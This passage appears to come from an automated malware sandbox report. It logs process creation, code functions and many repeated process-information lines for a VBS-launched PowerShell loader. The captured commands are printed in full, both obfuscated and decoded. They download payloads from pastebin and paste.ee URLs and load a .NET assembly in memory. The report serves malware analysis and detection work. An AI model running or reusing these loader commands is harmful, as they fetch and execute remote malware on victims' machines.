$Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9811ED pushad ; ret 1_2_00007FFD9B981232
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B97113D pushad ; ret 3_2_00007FFD9B971192
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B97DC93 push ebx; retf 3_2_00007FFD9B97DCBA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B97DCC2 push ebx; retf 3_2_00007FFD9B97DCBA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B9B11A3 pushad ; ret 6_2_00007FFD9B9B11B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00457186 push ecx; ret 8_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041C7F3 push eax; retf 8_2_0041C7FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00457AA8 push eax; ret 8_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00434EB6 push ecx; ret 8_2_00434EC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00406EEB ShellExecuteW,URLDownloadToFileW,8_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
